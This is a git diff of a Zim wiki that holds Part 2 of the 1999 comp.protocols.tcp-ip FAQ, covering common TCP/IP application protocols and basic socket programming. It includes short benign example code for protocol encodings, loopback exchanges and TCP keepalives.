which is especially valuable for people who need to
|
||||
understand the protocols in depth.
|
||||
|
||||
If you're writing programs that use TCP/IP then the classic text
|
||||
is "Unix Network Programming" by W. Richard Stevens, published by
|
||||
Prentice Hall, 1990 (ISBN 0-13-949876-1). It's now being rewritten
|
||||
as a three volume set. The first volume "Unix Network Programming:
|
||||
Networking APIs: Sockets and Xti" published by Prentice Hall, 1997
|
||||
(ISBN 013490012X), contains just about everything you need to know
|
||||
about using TCP/IP and includes material on topics (eg IPv6,
|
||||
multicasting, threads) that are not covered in the original UNP.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
This compilation contains the opinions of the FAQ maintainer and the
|
||||
various FAQ contributors. Any resemblance to the opinions of the FAQ
|
||||
maintainer's employer is entirely coincidental.
|
||||
|
||||
Copyright (C) Mike Oliver 1997-1999. All Rights Reserved.
|
||||
@@ -0,0 +1,491 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:36:12+08:00
|
||||
|
||||
====== Frequently Asked Questions (1999-09) Part 2 of 2 ======
|
||||
Created Tuesday 07 June 2011
|
||||
From: tcp-ip-faq@eng.sun.com (TCP/IP FAQ Maintainer)
|
||||
Newsgroups: comp.protocols.tcp-ip
|
||||
Subject: TCP/IP FAQ; Frequently Asked Questions (1999-09) Part 2 of 2
|
||||
Date: 7 Sep 1999 03:38:45 GMT
|
||||
Message-ID: <tcp-ip-faq-2.1999-09@eng.sun.com>
|
||||
Summary: Part 2 of a 2-part informational posting that contains
|
||||
responses to common questions on basic TCP/IP network
|
||||
protocols and applications.
|
||||
X-Disclaimer: Approval for postings in *.answers is based on form, not content.
|
||||
|
||||
Archive-name: internet/tcp-ip/tcp-ip-faq/part2
|
||||
Version: 5.15
|
||||
Last-modified: 1999-09-06 20:11:43
|
||||
Posting-Frequency: monthly (first Friday)
|
||||
Maintainer: tcp-ip-faq@eng.sun.com (Mike Oliver)
|
||||
URL: http://www.itprc.com/tcpipfaq/default.htm
|
||||
|
||||
TCP/IP Frequently Asked Questions
|
||||
|
||||
Part 2: Applications and Application Programming
|
||||
|
||||
This is Part 2 of the Frequently Asked Questions (FAQ) list for the
|
||||
comp.protocols.tcp-ip Usenet newsgroup. The FAQ provides answers to a
|
||||
selection of common questions on the various protocols (IP, TCP, UDP,
|
||||
ICMP and others) that make up the TCP/IP protocol suite. It is posted
|
||||
to the news.answers, comp.answers and comp.protocols.tcp-ip newsgroups
|
||||
on or about the first Friday of every month.
|
||||
|
||||
The FAQ is posted in two parts. Part 1 contains answers to general
|
||||
questions and questions that concern the fundamental components of the
|
||||
suite. Part 2 contains answers to questions concerning common
|
||||
applications that depend on the TCP/IP suite for their network
|
||||
connectivity.
|
||||
|
||||
Comments on this document can be emailed to the FAQ maintainer at
|
||||
<tcp-ip-faq@eng.sun.com>.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
Table of Contents
|
||||
|
||||
FAQ Part 2 -- Applications and Application Programming
|
||||
|
||||
What Are The Common TCP/IP Application Protocols?
|
||||
|
||||
1. DHCP
|
||||
2. DNS
|
||||
3. FTP
|
||||
4. HTTP
|
||||
5. IMAP
|
||||
6. NFS
|
||||
7. NNTP
|
||||
8. NTP
|
||||
9. POP
|
||||
10. Rlogin
|
||||
11. Rsh
|
||||
12. SMTP
|
||||
13. SNMP
|
||||
14. Ssh
|
||||
15. Telnet
|
||||
16. X Window System
|
||||
|
||||
TCP/IP Programming
|
||||
|
||||
1. What are sockets?
|
||||
2. How can I detect that the other end of a TCP connection has
|
||||
crashed?
|
||||
3. Can TCP keepalive timeouts be configured?
|
||||
4. Are there object-oriented network programming tools?
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
What Are The Common TCP/IP Application Protocols?
|
||||
|
||||
1. DHCP
|
||||
|
||||
Dynamic Host Configuration Protocol (DHCP) allows IP addresses to
|
||||
be allocated to hosts on an as-needed basis. The conventional
|
||||
scheme of allocating a permanent fixed IP address to every host is
|
||||
wasteful of addresses in situations where only a relatively small
|
||||
number of hosts are active at any given time. DHCP lets a host
|
||||
'borrow' an IP address from a pool of IP addresses; when the
|
||||
address is no longer needed it is recycled and made available for
|
||||
use by some other host. DHCP also allows a host to retrieve a
|
||||
variety of configuration information at the same time as it
|
||||
acquires an IP address.
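
The borrow-and-recycle idea can be modelled in a few lines of Python.
This is only a toy model of the address pool: it does not speak the
DHCP wire protocol and has no lease timers, and the class and method
names are invented for the illustration.

```python
import ipaddress


class AddressPool:
    """Toy pool: addresses are lent to clients and recycled on release."""

    def __init__(self, first, last):
        start = int(ipaddress.ip_address(first))
        end = int(ipaddress.ip_address(last))
        self.free = [str(ipaddress.ip_address(n)) for n in range(start, end + 1)]
        self.leases = {}                     # client id -> borrowed address

    def acquire(self, client_id):
        if client_id in self.leases:         # a returning client keeps its address
            return self.leases[client_id]
        if not self.free:
            return None                      # pool exhausted
        address = self.free.pop(0)
        self.leases[client_id] = address
        return address

    def release(self, client_id):
        address = self.leases.pop(client_id, None)
        if address is not None:
            self.free.append(address)        # make it available to another host
```

A pool of two addresses can serve three hosts as long as no more than
two of them are active at once, which is the saving the paragraph
above describes.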
|
||||
|
||||
DHCP depends on UDP to carry packets between the client and server
|
||||
tasks.
|
||||
|
||||
DHCP is defined by RFC's 2131 and 2132. A widely-used
|
||||
implementation of DHCP can be downloaded from
|
||||
<http://www.isc.org/dhcp.html>.
|
||||
|
||||
2. DNS
|
||||
|
||||
The Domain Name System (DNS) provides dynamic on-demand
|
||||
translation between human-readable names (like www.pizzahut.com)
|
||||
and the numeric addresses actually used by IP (like
|
||||
192.112.170.243). The basics of DNS operation are defined in RFC's
|
||||
1034, 1101, 1876, 1982 and 2065.
|
||||
|
||||
DNS uses both UDP and TCP. It uses UDP to carry simple queries and
|
||||
responses but depends on TCP to guarantee the correct and orderly
|
||||
delivery of large amounts of bulk data (eg transfers of entire
|
||||
zone configurations) across the network.
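
To show how small a "simple query" is, the following Python sketch
encodes a standard query for an address record in the RFC 1035
message format. It only builds the bytes; sending them to a name
server is left out, and the function name and default query ID are
assumptions of the example.

```python
import struct


def build_dns_query(name, query_id=0x1234):
    """Encode a recursive query for the A record of `name`."""
    # Header: ID, flags (only "recursion desired" set), one question,
    # and zero answer, authority and additional records.
    header = struct.pack("!HHHHHH", query_id, 0x0100, 1, 0, 0, 0)
    # The name is sent as length-prefixed labels ending in a zero-length label.
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\0"
    question = qname + struct.pack("!HH", 1, 1)   # QTYPE=A, QCLASS=IN
    return header + question
```

A query for www.pizzahut.com built this way is 34 bytes long, which
fits comfortably in a single UDP datagram.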
|
||||
|
||||
DNS standards are discussed in the comp.protocols.dns.std
|
||||
newsgroup. A very widely-used implementation of DNS called BIND
|
||||
(Berkeley Internet Name Domain) is discussed in the
|
||||
comp.protocols.dns.bind newsgroup, and the BIND software itself
|
||||
can be downloaded from <http://www.isc.org/bind.html>. The
|
||||
operation and politics of DNS are discussed in the
|
||||
comp.protocols.tcp-ip.domains newsgroup.
|
||||
|
||||
3. FTP
|
||||
|
||||
File Transfer Protocol (FTP) provides a mechanism for moving data
|
||||
files between systems. In addition to the fundamental PUT and GET
|
||||
operations, FTP provides a small number of file management and
|
||||
user authentication facilities. The protocol is defined in RFC
|
||||
959.
|
||||
|
||||
FTP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
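
FTP's control connection carries some addresses as plain text. The
PORT command of RFC 959, for instance, sends an IPv4 address and TCP
port as six comma-separated decimal numbers. A Python sketch of that
encoding follows; the helper names and sample values are assumptions
made for the illustration.

```python
def format_port_command(ip, port):
    """Return the PORT command line for an IPv4 address and TCP port."""
    h1, h2, h3, h4 = ip.split(".")
    p1, p2 = divmod(port, 256)               # high byte and low byte of the port
    return "PORT %s,%s,%s,%s,%d,%d\r\n" % (h1, h2, h3, h4, p1, p2)


def parse_port_command(line):
    """Recover (ip, port) from a PORT command line."""
    numbers = line.strip().split(" ", 1)[1].split(",")
    ip = ".".join(numbers[:4])
    port = int(numbers[4]) * 256 + int(numbers[5])
    return ip, port
```

For example, address 192.168.1.10 and port 5001 become
"PORT 192,168,1,10,19,137", since 19 * 256 + 137 = 5001.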
|
||||
|
||||
4. HTTP
|
||||
|
||||
Hypertext Transfer Protocol (HTTP) is the protocol used to move
|
||||
Web pages across an internet. Version 1.0 of HTTP is defined by
|
||||
RFC 1945. Version 1.1 makes more efficient use of TCP and is
|
||||
defined by RFC 2068.
|
||||
|
||||
HTTP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
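
Because HTTP is plain text carried over a TCP connection, a request
can be issued with nothing more than a socket. The Python sketch
below sends a bare HTTP/1.0 GET and returns the status line; the tiny
loopback server is included only so that the example can be run
without a network, and all names in it are invented for the
illustration.

```python
import http.server
import socket
import threading


def fetch_status_line(host, port, path="/"):
    """Send a bare HTTP/1.0 GET over TCP and return the status line."""
    with socket.create_connection((host, port)) as s:
        s.sendall(("GET %s HTTP/1.0\r\n\r\n" % path).encode("ascii"))
        response = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:                    # server closed the connection
                break
            response += chunk
    return response.split(b"\r\n", 1)[0].decode("ascii")


class HelloHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"hello\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass                                 # keep the demo quiet


def start_demo_server():
    """Start a throwaway HTTP server on a free loopback port."""
    server = http.server.HTTPServer(("127.0.0.1", 0), HelloHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Calling start_demo_server() and passing its port (available as
server.server_address[1]) to fetch_status_line() exercises the whole
exchange on one machine.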
|
||||
|
||||
5. IMAP
|
||||
|
||||
Internet Message Access Protocol (IMAP) allows clients to
|
||||
manipulate email messages and mailboxes that reside on some server
|
||||
machine. The current version of IMAP is Version 4, usually
|
||||
referred to as IMAP4. IMAP4 is described by RFC 2060. IMAP
|
||||
provides no way of sending email; client programs that use IMAP to
|
||||
read mail usually use SMTP to send messages. IMAP is more powerful
|
||||
and more complex than the other widely-used mail-reading protocol
|
||||
POP.
|
||||
|
||||
IMAP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
|
||||
|
||||
IMAP is discussed in the comp.mail.imap newsgroup.
|
||||
|
||||
6. NFS
|
||||
|
||||
Network File System (NFS) allows files stored on one machine (the
|
||||
"server") to be accessed by other machines (the "clients") as
|
||||
though the files were actually present on the client systems. NFS
|
||||
is defined in terms of a Remote Procedure Call (RPC) abstraction
|
||||
which in turn formats its packets according to a
|
||||
processor-independent eXternal Data Representation (XDR).
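
To give a flavour of what "processor-independent" means here, the
following Python sketch encodes two XDR basic types: integers are
four bytes in big-endian order, and strings are a four-byte length
followed by the bytes, padded with zeroes to a multiple of four. The
function names are assumptions of the example, which covers only
these two types.

```python
import struct


def xdr_int(value):
    """Encode a signed 32-bit integer in big-endian order."""
    return struct.pack("!i", value)


def xdr_string(text):
    """Encode a string as length, bytes, and zero padding to 4 bytes."""
    data = text.encode("ascii")
    padding = (4 - len(data) % 4) % 4
    return struct.pack("!I", len(data)) + data + b"\0" * padding


def xdr_unpack_string(buf, offset=0):
    """Decode a string; return it with the offset of the next item."""
    (length,) = struct.unpack_from("!I", buf, offset)
    start = offset + 4
    text = buf[start:start + length].decode("ascii")
    next_offset = start + length + (4 - length % 4) % 4
    return text, next_offset
```

The byte order is fixed by the format rather than by the sending
machine, so both ends decode the same values whatever their native
representation.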
|
||||
|
||||
Version 2 of NFS is defined in RFC 1094 and Version 3 is defined
|
||||
in RFC 1813. The RPC mechanism most often used with NFS, ONC/RPC,
|
||||
is defined by RFC 1831. The XDR conventions used by ONC/RPC are
|
||||
defined by RFC 1832. The ONC/RPC binding mechanism (a minimal
|
||||
directory service which allows RPC clients to rendezvous with RPC
|
||||
servers) is defined by RFC 1833.
|
||||
|
||||
NFS can run over any kind of transport, but is most often used
|
||||
over UDP. UDP does not guarantee packet delivery or ordering, so
|
||||
when NFS runs over UDP the RPC implementation must provide its own
|
||||
guarantees of correctness. When NFS runs over TCP, the RPC layer
|
||||
can depend on TCP to provide this kind of correctness.
|
||||
|
||||
NFS is discussed in the comp.protocols.nfs newsgroup.
|
||||
|
||||
7. NNTP
|
||||
|
||||
Network News Transfer Protocol (NNTP) is used to propagate netnews
|
||||
postings (including Usenet postings) between systems. It is
|
||||
defined in RFC 977. (The format of netnews messages is defined in
|
||||
RFC 1036.)
|
||||
|
||||
NNTP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
|
||||
|
||||
NNTP is discussed in the news.software.nntp newsgroup. A very
|
||||
widely-used implementation of NNTP called INN (InterNet News) can
|
||||
be downloaded from <http://www.isc.org/inn.html>.
|
||||
|
||||
8. NTP
|
||||
|
||||
Network Time Protocol (NTP) is used to synchronise time-of-day
|
||||
clocks between various computer systems. The current version of
|
||||
NTP is Version 3, defined in RFC 1305. Earlier versions (2 and 1
|
||||
respectively) of the protocol are defined in RFC's 1119 and 1059.
|
||||
David Mills maintains a publicly available implementation of NTP
|
||||
server and clients along with a comprehensive collection of NTP
|
||||
documentation on the web at <http://www.eecis.udel.edu/%7Entp/>.
|
||||
|
||||
NTP depends on UDP to carry packets between server and client
|
||||
tasks.
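
An NTP exchange fits in a single small UDP datagram each way. The
Python sketch below builds a 48-byte client request and converts the
transmit timestamp of a reply to Unix time; it does not contact any
server, and the function names are assumptions of the example.

```python
import struct

NTP_UNIX_OFFSET = 2208988800    # seconds from 1900-01-01 to 1970-01-01


def build_ntp_request(version=3):
    """Build a client request: 48 bytes, all zero except the first."""
    first_byte = (0 << 6) | (version << 3) | 3    # LI=0, version, mode 3 (client)
    return bytes([first_byte]) + b"\0" * 47


def transmit_time_unix(packet):
    """Convert the transmit timestamp (bytes 40-47) to Unix seconds."""
    seconds, fraction = struct.unpack("!II", packet[40:48])
    return seconds - NTP_UNIX_OFFSET + fraction / 2**32
```

To use it against a real server, the request would be sent with a
UDP socket to port 123 of a server of your choosing and the reply
passed to transmit_time_unix().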
|
||||
|
||||
NTP is discussed in the comp.protocols.time.ntp newsgroup.
|
||||
|
||||
9. POP
|
||||
|
||||
Post Office Protocol (POP) allows clients to read and remove email
|
||||
from a mailbox that resides on some server machine. The current
|
||||
version of POP is Version 3, usually referred to as POP3. It is
|
||||
described by RFC 1939. POP provides no way of sending email;
|
||||
client programs that use POP to read mail usually use SMTP to send
|
||||
messages. POP is simpler and less powerful than the other
|
||||
widely-used mail-reading protocol IMAP.
|
||||
|
||||
POP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
|
||||
|
||||
POP doesn't have its own dedicated newsgroup. It is sometimes
|
||||
discussed in client-specific newsgroups in the comp.mail.*
|
||||
hierarchy.
|
||||
|
||||
10. Rlogin
|
||||
|
||||
Remote Login (rlogin) provides a network terminal or "remote
|
||||
login" capability. Rlogin is similar to Telnet but it adds a
|
||||
couple of features that make it a little more convenient than
|
||||
Telnet.
|
||||
|
||||
Rlogin is one of the so-called Berkeley r-commands (where the "r"
|
||||
stands for "remote"), a family of commands created at UC Berkeley
|
||||
during the development of BSD Unix to provide access to remote
|
||||
systems in ways that are more convenient than the original TCP/IP
|
||||
commands.
|
||||
|
||||
The most obvious convenience is that rlogin, like other
|
||||
r-commands, examines a .rhosts (pronounced "dot ar hosts") file on
|
||||
the server side to authenticate logins based on the client host
|
||||
address. The .rhosts file can be constructed to allow remote
|
||||
access without requiring you to enter a password. If used
|
||||
improperly this feature can be a security threat, but if used
|
||||
correctly it can actually enhance security by not requiring a
|
||||
password to be sent over the network where it might be read by a
|
||||
packet sniffer.
|
||||
|
||||
The r-commands depend on TCP to guarantee the correct and orderly
|
||||
delivery of data across the network.
|
||||
|
||||
11. Rsh
|
||||
|
||||
Remote Shell (rsh) is an r-command that provides for remote
|
||||
execution of arbitrary commands. It allows you to run a command on
|
||||
a server without having to actually log in on the server. More
|
||||
importantly it allows you to feed data to the remote command and
|
||||
retrieve the command's output without having to stage the data
|
||||
through temporary files on the server.
|
||||
|
||||
Like other Berkeley r-commands, rsh uses the .rhosts file on the
|
||||
server side to authenticate access based on the client's host
|
||||
address.
|
||||
|
||||
On some non-BSD systems the Remote Shell command is named remsh
|
||||
because by the time the command was delivered on those systems the
|
||||
usual rsh name had been used for a "restricted shell" application,
|
||||
a command line interpreter intended to boost security by
|
||||
preventing its users from performing certain activities.
|
||||
|
||||
On Unix systems most of the work of rsh is handled by the rcmd(3)
|
||||
library function, so if you're writing a program that needs
|
||||
rsh-like functionality then you might be able to use that
|
||||
function. However, since the rsh protocol requires the client to
|
||||
use a privileged port you'll only be able to use rcmd(3) if your
|
||||
program executes with superuser privileges. That's why the rsh
|
||||
executable is setuid-root on Unix machines.
|
||||
|
||||
If your program will not run as root then you might be able to use
|
||||
the rexec(3) function instead. rexec(3) does not use the
|
||||
server-side .rhosts file. Instead it requires the client to supply
|
||||
an account password which is then transmitted unencrypted over the
|
||||
network.
|
||||
|
||||
12. SMTP
|
||||
|
||||
Simple Mail Transfer Protocol (SMTP) is used to deliver email from
|
||||
one system to another. The basic SMTP is defined in RFC 821 and
|
||||
the format of Internet mail messages is described in RFC 822.
|
||||
|
||||
SMTP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
|
||||
|
||||
A very widely-used implementation of SMTP called sendmail can be
|
||||
downloaded from <http://www.sendmail.org/>. Other open-source SMTP
|
||||
implementations include qmail (available at
|
||||
<http://www.qmail.org/>), postfix (available at
|
||||
<http://www.postfix.org/>), smail (available at
|
||||
<ftp://ftp.planix.com/pub/Smail/>), exim (available at
|
||||
<http://www.exim.org/>) and smtpd (available at
|
||||
<http://www.obtuse.com/smtpd.html>).
|
||||
|
||||
13. SNMP
|
||||
|
||||
Simple Network Management Protocol (SNMP) provides a means of
|
||||
monitoring and managing systems over a network. SNMP defines a
|
||||
method of sending queries (the GET and GET-NEXT primitives) and
|
||||
commands (the SET primitive) from a management station client to
|
||||
an agent server running on the target system, and collecting
|
||||
responses and unsolicited event notifications (the TRAP
|
||||
primitive).
|
||||
|
||||
Version 1 of SNMP is defined by RFC's 1098 and 1157. SNMP Version
|
||||
2 is defined by RFC's 1441, 1445, 1446, 1447 and 1901 through
|
||||
1909. The various things that can be monitored and managed by
|
||||
SNMP, collectively called the Management Information Base (MIB),
|
||||
are defined in dozens of additional RFC's.
|
||||
|
||||
SNMP sends traffic through UDP because of its relative simplicity
|
||||
and low overhead.
|
||||
|
||||
SNMP is discussed in the comp.protocols.snmp newsgroup.
|
||||
|
||||
14. Ssh
|
||||
|
||||
Secure Shell (ssh) provides remote login and execution features
|
||||
similar to those of the rsh and rlogin r-commands, but ssh
|
||||
encrypts the data that is exchanged over the network. Encryption
|
||||
can protect sensitive information, and it is not uncommon for
|
||||
security-conscious administrators to disable plain rsh and telnet
|
||||
services in favour of ssh.
|
||||
|
||||
The SSH protocol used by the ssh command has also been used to
|
||||
build a secure file transfer application which can be used as an
|
||||
alternative to FTP for sensitive data.
|
||||
|
||||
Complete information on ssh and its SSH protocol can be found at
|
||||
<http://www.ssh.fi/>.
|
||||
|
||||
15. Telnet
|
||||
|
||||
Telnet provides a network terminal or "remote login" capability.
|
||||
The Telnet server accepts data from the telnet client and forwards
|
||||
them to the operating system in such a way that the received
|
||||
characters are treated as though they had been typed at a terminal
|
||||
keyboard. Responses generated by the server operating system are
|
||||
passed back to the Telnet client for display.
|
||||
|
||||
The Telnet protocol provides the ability to negotiate many kinds
|
||||
of terminal-related behaviour (local vs. remote echoing, line mode
|
||||
vs. character mode and others) between the client and server. The
|
||||
basic Telnet protocol is defined in RFC's 818 and 854 and the
|
||||
option negotiation mechanism is described in RFC 855.
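
Option negotiation travels in-band as three-byte sequences that start
with the IAC ("interpret as command") byte. The Python sketch below
separates those sequences from ordinary text and politely refuses
every option, which is about the simplest behaviour a client can
adopt. It ignores subnegotiation (SB ... SE) entirely, and the
function name is made up for the illustration.

```python
IAC, DONT, DO, WONT, WILL = 255, 254, 253, 252, 251


def refuse_all_options(data):
    """Split received bytes into (text, reply), refusing every option."""
    text = bytearray()
    reply = bytearray()
    i = 0
    while i < len(data):
        byte = data[i]
        if byte != IAC:
            text.append(byte)                # ordinary data
            i += 1
        elif i + 1 >= len(data):
            break                            # lone IAC at end of buffer
        elif data[i + 1] == IAC:
            text.append(IAC)                 # escaped literal byte 255
            i += 2
        elif data[i + 1] in (DO, DONT, WILL, WONT):
            if i + 2 >= len(data):
                break                        # option byte not yet received
            option = data[i + 2]
            if data[i + 1] == DO:
                reply += bytes([IAC, WONT, option])   # "I won't do that"
            elif data[i + 1] == WILL:
                reply += bytes([IAC, DONT, option])   # "please don't"
            i += 3                           # DONT and WONT need no answer here
        else:
            i += 2                           # some other two-byte command
    return bytes(text), bytes(reply)
```

Feeding it a server greeting such as IAC DO 1, IAC WILL 3 followed by
"login: " returns the text "login: " together with the replies
IAC WONT 1 and IAC DONT 3.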
|
||||
|
||||
Specific Telnet options, implementation issues and protocol quirks
|
||||
are discussed in several dozen RFC's dating back to 1971. (That's
|
||||
RFC's 97, 137, 139, 206, 215, 216, 318, 328, 340, 393, 435, 466,
|
||||
495, 513, 559, 560, 562, 563, 581, 587, 595, 596, 652, 653, 654,
|
||||
655, 656, 657, 658, 698, 726, 727, 728, 732, 735, 736, 748, 749,
|
||||
779, 856, 857, 858, 859, 860, 861, 885, 927, 933, 946, 1041, 1043,
|
||||
1053, 1073, 1079, 1091, 1096, 1097, 1143, 1184, 1205, 1372, 1408,
|
||||
1411, 1412, 1416, 1571, 1572 and 2066, and that's not counting
|
||||
obsolete ones. A couple of these are not entirely serious.) As you
|
||||
might infer from this pedigree, Telnet is a widely-deployed and
|
||||
well-used protocol.
|
||||
|
||||
Telnet depends on TCP to guarantee the correct and orderly
|
||||
delivery of data between the client and server.
|
||||
|
||||
16. X Window System
|
||||
|
||||
The X Window System (X11R6 is the most recent incarnation) allows
|
||||
client programs running on one machine to control the graphic
|
||||
display, keyboard and mouse of some other machine or of a
|
||||
dedicated X display terminal.
|
||||
|
||||
X depends on TCP to guarantee the correct and orderly delivery of
|
||||
data across the network.
|
||||
|
||||
The X Window System is discussed in the comp.windows.x newsgroup.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
TCP/IP Programming
|
||||
|
||||
1. What are sockets?
|
||||
|
||||
A socket is an abstraction that represents an endpoint of
|
||||
communication. Most applications that consciously use TCP and UDP
|
||||
do so by creating a socket of the appropriate type and then
|
||||
performing a series of operations on that socket. The operations
|
||||
that can be performed on a socket include control operations (such
|
||||
as associating a port number with the socket, initiating or
|
||||
accepting a connection on the socket, or destroying the socket),
|
||||
data transfer operations (such as writing data through the socket
|
||||
to some other application, or reading data from some other
|
||||
application through the socket) and status operations (such as
|
||||
finding the IP address associated with the socket).
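
The three kinds of operation can be seen together in a short Python
sketch that runs a one-shot TCP exchange over loopback. The function
name and the upper-casing "service" are invented for the example;
the socket calls themselves are the standard ones.

```python
import socket
import threading


def echo_once(message):
    """Run one client/server exchange over loopback TCP."""
    # Control operations: create the socket, bind it to a port, listen.
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))            # port 0: let the OS choose
    server.listen(1)
    address = server.getsockname()           # status: which address and port?

    def serve():
        conn, _peer = server.accept()        # control: accept a connection
        with conn:
            data = conn.recv(1024)           # data transfer: read
            conn.sendall(data.upper())       # data transfer: write

    worker = threading.Thread(target=serve)
    worker.start()

    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(address)                  # control: initiate a connection
    client.sendall(message)
    reply = client.recv(1024)
    local_ip = client.getsockname()[0]       # status: our own IP address
    client.close()                           # control: destroy the socket

    worker.join()
    server.close()
    return reply, local_ip
```

A UDP version would create the sockets with SOCK_DGRAM and skip the
listen, accept and connect steps.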
|
||||
|
||||
The complete set of operations that can be performed on a socket
|
||||
constitutes the Sockets API (Application Programming Interface).
|
||||
If you are interested in writing programs that use TCP/IP then
|
||||
you'll probably need to use and understand the sockets API. Your
|
||||
system manuals may have a description of the API (try `man socket'
|
||||
if you're using a Unix system) and many books devote chapters to
|
||||
it. A FAQ list for sockets programming is available on the Web
|
||||
from its Canadian home at <http://www.ibrado.com/sock-faq/>, from
|
||||
a UK mirror at <http://kipper.york.ac.uk/%7Evic/sock-faq/> or by
|
||||
anonymous FTP from
|
||||
<ftp://rtfm.mit.edu/pub/usenet/news.answers/unix-faq/>.
|
||||
|
||||
The TLI (Transport Layer Interface) API provides an alternative
|
||||
programming interface to TCP/IP on some systems, notably those
|
||||
based on AT&T's System V Unix. The Open Group, a Unix standards
|
||||
body, defines a variation of TLI called XTI (X/Open Transport
|
||||
Interface). Note that both sockets and TLI (and XTI) are
|
||||
general-purpose facilities and are defined to be completely
|
||||
independent of TCP/IP. TCP/IP is just one of the protocol families
|
||||
that can be accessed through these APIs.
|
||||
|
||||
2. How can I detect that the other end of a TCP connection has
|
||||
crashed? Can I use "keepalives" for this?
|
||||
|
||||
Detecting crashed systems over TCP/IP is difficult. TCP doesn't
|
||||
require any transmission over a connection if the application
|
||||
isn't sending anything, and many of the media over which TCP/IP is
|
||||
used (e.g. Ethernet) don't provide a reliable way to determine
|
||||
whether a particular host is up. If a server doesn't hear from a
|
||||
client, it could be because the client has nothing to say, some network
|
||||
between the server and client may be down, the server's or client's
|
||||
network interface may be disconnected, or the client may have
|
||||
crashed. Network failures are often temporary (a thin Ethernet
|
||||
will appear down while someone is adding a link to the daisy
|
||||
chain, and it often takes a few minutes for new routes to
|
||||
stabilize when a router goes down) and TCP connections shouldn't
|
||||
be dropped as a result.
|
||||
|
||||
Keepalives are a feature of the sockets API that requests that an
|
||||
empty packet be sent periodically over an idle connection; this
|
||||
should evoke an acknowledgement from the remote system if it is
|
||||
still up, a reset if it has rebooted, and a timeout if it is down.
|
||||
These are not normally sent until the connection has been idle for
|
||||
a few hours. The purpose isn't to detect a crash immediately, but
|
||||
to keep unnecessary resources from being allocated forever.
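
On systems with the BSD sockets interface, keepalives are requested per socket through the SO_KEEPALIVE option. A minimal sketch, assuming a POSIX system; the helper names enable_keepalive and keepalive_enabled are invented for this example:

```c
#include <sys/socket.h>

/* Hypothetical helper: ask the system to probe this connection once it
   has been idle. Returns 0 on success, -1 on error (as setsockopt does). */
int enable_keepalive(int fd)
{
    int on = 1;
    return setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &on, sizeof on);
}

/* Hypothetical helper: returns 1 if keepalives are enabled on fd,
   0 if they are not, -1 on error. */
int keepalive_enabled(int fd)
{
    int value = 0;
    socklen_t len = sizeof value;

    if (getsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &value, &len) < 0)
        return -1;
    return value != 0;
}
```

Setting the option only turns the feature on. How long the connection must be idle before the first probe is sent is a system setting and is not changed by this code.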
|
||||
|
||||
If more rapid detection of remote failures is required, this
|
||||
should be implemented in the application protocol. There is no
|
||||
standard mechanism for this, but an example is requiring clients
|
||||
to send a "no-op" message every minute or two. An example protocol
|
||||
that uses this is X Display Manager Control Protocol (XDMCP), part
|
||||
of the X Window System, Version 11; the XDM server managing a
|
||||
session periodically sends a Sync command to the display server,
|
||||
which should evoke an application-level response, and resets the
|
||||
session if it doesn't get a response (this is actually an example
|
||||
of a poor implementation, as a timeout can occur if another client
|
||||
"grabs" the server for too long).
|
||||
|
||||
3. Can the TCP keepalive timeouts be configured?
|
||||
|
||||
This varies by operating system. There is a program that works on
|
||||
many Unices (though not Linux or Solaris), called netconfig, that
|
||||
allows one to do this and documents many of the variables. It is
|
||||
available by anonymous FTP from
|
||||
<ftp://cs.ucsd.edu:/pub/csl/Netconfig/>.
|
||||
|
||||
In addition, Richard Stevens' TCP/IP Illustrated, Volume 1
|
||||
includes a good discussion of setting the most useful variables on
|
||||
many platforms.
|
||||
|
||||
4. Are there object-oriented network programming tools?
|
||||
|
||||
Yes. One such system is the ADAPTIVE Communication Environment
|
||||
(ACE). The README file for ACE is available on the Web at
|
||||
<http://www.cs.wustl.edu/%7Eschmidt/ACE.html>. All software and
|
||||
documentation is available via both anonymous ftp and the Web.
|
||||
|
||||
ACE is available for anonymous ftp from
|
||||
<ftp://ics.uci.edu/gnu/>. That's a compressed
|
||||
tar archive approximately 500KB in size. This release contains
|
||||
the source code, documentation, and example test drivers
|
||||
for C++ wrapper libraries.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
This compilation contains the opinions of the FAQ maintainer and the
|
||||
various FAQ contributors. Any resemblance to the opinions of the FAQ
|
||||
maintainer's employer is entirely coincidental.
|
||||
|
||||
1260
Zim/Programme/APUE/FAQ/The_Well-Tempered_Unix_Application.txt
Normal file
1385
Zim/Programme/APUE/FAQ/Unix-socket-faq_for_network_programming.txt
Normal file
@@ -0,0 +1,185 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:06:27+08:00
|
||||
|
||||
====== Unix - Frequently Asked Questions (Contents) ======
|
||||
Created 星期二 07 六月 2011
|
||||
http://www.faqs.org/faqs/unix-faq/faq/contents/
|
||||
|
||||
Message-ID: <unix-faq/faq/contents_1084272547@rtfm.mit.edu>
|
||||
X-Last-Updated: 1996/06/11
|
||||
